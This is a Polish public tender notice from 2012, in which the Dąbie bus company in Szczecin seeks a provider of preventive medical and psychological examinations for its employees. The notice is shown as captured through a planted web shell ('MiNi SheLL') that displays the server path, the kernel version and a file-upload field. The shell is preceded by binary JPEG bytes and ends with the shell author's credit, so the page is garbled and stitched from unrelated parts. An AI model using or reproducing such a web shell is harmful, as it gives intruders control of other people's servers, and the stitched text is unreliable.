JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121001/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121001/373076-N-2012.html

<p class="kh_header"><b>Szczecin: Przeprowadzenie badań profilaktycznych pracowników Szczecińskiego Przedsiębiorstwa Autobusowego Dąbie Sp. z o.o.</b><br>
<b>Numer ogłoszenia: 373076 - 2012; data zamieszczenia: 01.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szczecińskie Przedsiębiorstwo Autobusowe "Dąbie" Sp. z o.o. , ul. A. Struga 10, 70-784 Szczecin, woj. zachodniopomorskie, tel. 091 4643602 w. 236, faks 091 4643529.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spad.szczecin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Sp. z o.o..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie badań profilaktycznych pracowników Szczecińskiego Przedsiębiorstwa Autobusowego Dąbie Sp. z o.o..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.1.	Przedmiotem zamówienia jest wykonanie badań profilaktycznych pracowników w zakresie 	wstępnych, okresowych i kontrolnych badań lekarskich kierowców i osób ubiegających się o 	uprawnienia do kierowania pojazdami, przeprowadzanie badań sanitarno - 	epidemiologicznych oraz badań psychologicznych i innej profilaktycznej opieki nad pracownikami zamawiającego, niezbędnych ze względu na warunki pracy pracowników 	oraz innych osób (kandydatów do pracy itp.), w granicach administracyjnych miasta Szczecina w okresie od 01.01.2013 r. do 31.12.2015 r.
1.2.	Słownik CPV:  85147000-1.
1.3.	Zakres przedmiotowy zamówienia obejmuje wykonanie na rzecz Zamawiającego 	następujących świadczeń z zakresu opieki zdrowotnej:
1.1.1		profilaktycznych badań lekarskich:
- wstępnych,
- okresowych,
- kontrolnych.
Badania powinny być prowadzone zgodnie z wymogami określonymi w rozporządzeniu Ministra Zdrowia i Opieki Społecznej z dnia 30 maja 1996 r. w sprawie przeprowadzania badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie pracy (Dz. U. Nr 69, poz. 332 z późn. zm.) oraz rozporządzeniu Ministra Zdrowia z dnia 2 lutego 2006 r. w sprawie badań do celów sanitarno - epidemiologicznych (Dz. U. z dnia 17 lutego 2006 r. z późn. zm.).
1.1.2	badań lekarskich kierowców wykonywujących transport drogowy lub przewozy na	potrzeby własne - zgodnie z ustawą z dnia 6 września 2001 o transporcie drogowym (tekst jednolity z 2007 r. Dz. U. Nr 125, poz.874 z późn. zm.) oraz ustawą z dnia 20 czerwca 1997 r. - Prawo o ruchu drogowym (tekst jednolity Dz. U. Nr 210 z 11 grudnia 2003 r. z późn. zm.). Badania powinny być prowadzone zgodnie z wymogami  określonymi w rozporządzeniu Ministra Zdrowia z dnia 7 stycznia 2004 r. w 	sprawie badań lekarskich kierowców i osób ubiegających się o uprawnienia do kierowania pojazdami (Dz. U. Nr 2, poz.15 z późn. zm.).
1.1.3	badań psychologicznych - badania powinny być prowadzone zgodnie z wymogami 	określonymi w rozporządzeniu Ministra Zdrowia z dnia 1 kwietnia 2005 r. w sprawie 	badań psychologicznych kierowców i osób ubiegających się o uprawnienia do kierowania 	pojazdami oraz wykonujących pracę na stanowisku kierowcy (Dz. U. z dnia 26 kwietnia 	2005 r. z późn. zm.) oraz rozporządzeniu Ministra Pracy i Polityki Socjalnej z dnia 
	28 maja 1996 r. w sprawie rodzajów prac wymagających szczególnej sprawności 	psychofizycznej (Dz. U. Nr 62 poz. 287 z późn. zm.).
1.1.4	wydawania orzeczeń lekarskich o których mowa w § 1 ust 1 pkt 4 rozporządzenia 	Ministra Zdrowia i Opieki Społecznej z dnia 30 maja 1996 r. w sprawie przeprowadzania 	badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad 	pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w 	Kodeksie pracy (Dz. U. Nr 69, poz. 332 z późn. zm.) i w § 11 ust. 1 rozporządzenia 	Ministra Zdrowia z dnia 7 stycznia 2004 r. w sprawie badań lekarskich 	kierowców i osób 	ubiegających się o uprawnienia do kierowania pojazdami (Dz. U. Nr 2, 	poz.15 z późn. 	zm.).
1.1.5	prowadzenie badań i dokonywania wpisów do książeczek badań do celów 	sanitarno - epidemiologicznych, o których mowa w  § 4 ust. 2 rozporządzenia Ministra 	Zdrowia z dnia 2 lutego 2006 r. w sprawie badań do celów sanitarno-epidemiologicznych 	(Dz. U. z dnia 17 lutego 2006 r. z późn. zm.).
1.1.6	udziału lekarza sprawującego opiekę zdrowotną nad pracownikami w pracach 	zakładowej komisji bezpieczeństwa i higieny pracy zgodnie z przepisami Kodeksu 	pracy. 
1.1.7	We wszystkich przypadkach lekarz przeprowadzający badania profilaktyczne może 	poszerzyć jego zakres o dodatkowe specjalistyczne badania konsultacyjne oraz badania 	dodatkowe, a także wyznaczyć krótszy termin następnego badania, niż to określono we 	wskazówkach metodycznych, jeżeli stwierdzi, że jest to niezbędne dla prawidłowej oceny 	stanu zdrowia osoby przyjmowanej do pracy lub pracownika. Specjalistyczne badania konsultacyjne oraz badania dodatkowe, o których mowa w przywołanych przepisach stanowią część badania profilaktycznego.
2.2.1. Zakres podmiotowy zamówienia obejmuje wykonanie badań pracowników w następujących grupach zawodowych:
a)	kierowcy wykonywujący transport drogowy lub przewozy na potrzeby własne,
b)	pracownik zaplecza technicznego na stanowiskach robotniczych:
- pracownicy tej grupy narażeni są na więcej niż jeden czynnik szkodliwy lub uciążliwy dla zdrowia,
- mogą występować czynniki fizyczne (hałas, wibracja miejscowa, pyły zawierające wolną krzemionkę, czynniki chemiczne),
- część pracowników wykonuje pracę na wysokości do 3 m nad poziomem lub powyżej 3 m,
- wielu pracowników pracuje w systemie zmianowym,
- mogą występować czynniki uciążliwe przy niektórych czynnościach 
(wymuszona pozycja lub  narażenie na zmienne warunki atmosferyczne),
- czynności dodatkowe niektórych pracowników (kierowca pogotowia technicznego, kierowca - zaopatrzeniowiec, operator wózka jezdniowego, operator innego urządzenia, zmywacz taboru).
c)	pracownik na stanowisku nierobotniczym:
- część pracowników obsługuje monitor ekranowy powyżej 4 godzin na zmianę roboczą,
- część pracowników pracuje w systemie zmianowym.

2.2.1.1. Badania lekarskie wstępne, okresowe i kontrolne:
a)	kierowca autobusu: badanie ogólne, OB, morfologia krwi, poziom glukozy, mocz, EKG, 	RTG klatki piersiowej (raz na 2 lata),  badanie okulistyczne + dno oka, 	badanie 	laryngologiczne, badanie neurologiczne, badanie audiometryczne, książeczka 	do celów san.-epid.,
b)	pracownik zaplecza technicznego: badanie ogólne, OB, morfologia krwi, poziom 	glukozy, mocz, EKG, RTG klatki piersiowej (raz na 2 lata), badanie okulistyczne + dno oka, badanie laryngologiczne (w przypadku pracy na wysokości do 3 m), badanie 	audiometryczne (w przypadku pracy na wysokości do 3 m), badanie neurologiczne 	(w przypadku pracy na wysokości powyżej 3 m),
c) pracownik na stanowisku nierobotniczym: badanie ogólne, OB, morfologia krwi, poziom 	glukozy, mocz, EKG (powyżej 45 roku życia), RTG klatki piersiowej 
(raz na 2 lata), badanie okulistyczne (praca przy monitorze ekranowym co najmniej przez 	połowę 	dobowego wymiaru czasu pracy).
2.2.1.2. Badania psychologiczne dla:
a)	kierowca autobusu
b)	mechanik - kierowca pogotowia technicznego,
c)	kierowca - zaopatrzeniowiec,
d)	operator wózków jezdniowych.

1. Świadczenia zdrowotne wymienione w/w opis przedmiotu zamówienia wykonywane będą:
a)	wyłącznie w miejscu wskazanym w ofercie wykonawcy w granicach administracyjnych miasta Szczecina, w dni robocze od poniedziałku do piątku,
b)	w oparciu o posiadany przez wykonawcę i przy wykorzystaniu odpowiadającego aktualnym wymogom wiedzy medycznej sprzętu i urządzeń medycznych,
c)	przez wykwalifikowaną kadrę Wykonawcy posiadającą odpowiednią specjalizację w zakresie medycyny pracy, niezbędną wiedzę i doświadczenie oraz zgodnie z  obowiązującymi przepisami, stosowne uprawnienia do przeprowadzania badań profilaktycznych oraz orzekania o braku lub istnieniu przeciwwskazań zdrowotnych do  pracy na określonym stanowisku lub do kierowania pojazdami,
d)	przy udostępnianiu poradni i po przeprowadzaniu badań specjalistyczno-diagnostycznych,
e)	w terminie nie przekraczającym 1 dnia roboczego tj. w czasie nie dłuższym niż 8 roboczogodzin dla danego pracownika.
2. Po zakończeniu badań wykonawca wyda orzeczenia (na obowiązujących formularzach) o braku lub istnieniu przeciwwskazań zdrowotnych do pracy na określonym stanowisku pracy oraz o braku lub istnieniu przeciwwskazań zdrowotnych do kierowania pojazdami osobie badanej lub doręczy niezwłocznie zamawiającemu. Jeśli termin badan profilaktycznych kierowcy byłby zbieżny z badaniami wymaganymi w prawie o ruchu drogowym, należy przeprowadzić jedno badanie i na tej podstawie wydać stosowne oświadczenie.
3. Wykonawca zapewni odrębne miejsce rejestracji dla pracowników zamawiającego objętych badaniami profilaktycznymi oraz kompetentne osoby koordynujące prowadzenie badań.
4. Wykonawca wyznaczy lekarza sprawującego profilaktyczną opiekę zdrowotną nad pracownikami, a zamawiający zobowiązuje się zapewnić lekarzowi wyznaczonemu przez wykonawcę udział w Komisji Bezpieczeństwa i Higieny Pracy powołanej na podstawie art. 23712  Kodeksu pracy działającej na terenie zakładu zamawiającego, a także udostępnić posiadaną dokumentację z wyników kontroli warunków pracy w części odnoszącej się do ochrony zdrowia.
5. Wykonawca zobowiązuje się do zapewnienia udziału lekarza w komisji bezpieczeństwa i higieny pracy działającej u zamawiającego, w ramach ceny ofertowej. 
6. Do pracy w zakładowej komisji bezpieczeństwa i higieny pracy lekarz wskazany przez wykonawcę będzie każdorazowo zapraszany przez zamawiającego na podstawie informacji przesłanej listownie lub faksem. Spotkania te będą się odbywały nie rzadziej niż raz na kwartał.
7. Miejsce wykonania zamówienia - Gmina Miasto Szczecin. 
Ilość badań zgodnie z treścią specyfikacji istotnych warunków zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.14.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium w kwocie 3.000,00 zł (słownie: trzy tysiące złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania (art. 22 ust. 1 pkt 1 ustawy - Pzp) - poprzez złożenie dokumentu - odpisu z rejestru podmiotów wykonujących działalność leczniczą wydany przez właściwy organ prowadzący rejestr zgodnie z ustawą z 15 kwietnia 2011 roku o działalności leczniczej (Dz. U. Nr 112, poz. 654).

Ocena spełnienia przez wykonawców warunków zostanie dokonana na podstawie informacji zawartych odpowiednio w oświadczeniu o braku podstaw do wykluczenia, oświadczeniu o spełnianiu warunków udziału w postępowaniu oraz dokumentach potwierdzających spełnianie warunków udziału w postępowaniu na zasadzie: wykonawca spełnia albo nie spełnia poszczególne warunki udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby wykonawca wykazał się, że wykonał lub wykonuje należycie w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia jest krótszy - w tym okresie co najmniej 2 prace podobne, w tym każda o wartości co najmniej 10 000 zł brutto z podaniem wartości tych usług, przedmiotu, dat wykonania usług i odbiorców oraz załączenia dokumentów potwierdzających, że te usługi zostały/są wykonane należycie.
Ocena spełnienia przez wykonawców warunków zostanie dokonana na podstawie informacji zawartych odpowiednio w oświadczeniu o braku podstaw do wykluczenia, oświadczeniu o spełnianiu warunków udziału w postępowaniu oraz dokumentach potwierdzających spełnianie warunków udziału w postępowaniu na zasadzie: wykonawca spełnia albo nie spełnia poszczególne warunki udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu oceny spełniania warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu oceny spełniania warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu oceny spełniania warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza wprowadzenie zmiany w umowie w sprawie zamówienia publicznego w następującym przypadku:
a) w związku z ustawową zmianą stawki podatku od towarów i usług (VAT),
b) w związku z ustawową zmianą  przepisów dotyczącą zwiększenia zakresu badań objętych umową.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spad.szczecin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.spad.szczecin.pl.Na wniosek wykonawcy zamawiający przekaże treść specyfikacji w terminie 5 dni zgodnie z art. 42 ust. 2 u. Pzp. Cena SIWZ 20 zł netto (nie obejmuje kosztów opłaty pocztowej)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.10.2012 godzina 10:00, miejsce: w siedzibie zamawiającego, pokój nr 204 II piętro. Termin otwarcia ofert: 17.10.2012 godz. 10:30 w siedzibie zamawiającego, pokój nr 204 II piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com